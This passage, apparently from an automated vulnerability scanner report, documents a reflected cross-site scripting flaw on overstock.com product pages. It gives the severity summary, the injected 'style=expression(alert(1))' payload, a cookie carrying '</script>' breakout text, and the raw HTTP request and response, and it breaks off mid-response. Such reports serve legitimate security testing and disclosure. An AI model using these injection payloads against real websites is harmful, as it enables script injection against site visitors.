Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=16
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 121369

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ch
...[SNIP]...
<input type="hidden" name="c8128"style="x:expression(alert(1))"78e6724e003" value="1"/>
...[SNIP]...

2.170. http://www.overstock.com/Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 368b2"style%3d"x%3aexpression(alert(1))"ea0d990e260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 368b2"style="x:expression(alert(1))"ea0d990e260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC demonstrated here uses a dynamically evaluated expression inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/City-Scene-Black-White-Bamboo-Print-7-piece-Bed-in-a-Bag-with-Sheet-Set/3442343/product.html?368b2"style%3d"x%3aexpression(alert(1))"ea0d990e260=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:44:20 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:44:20 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407460933:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970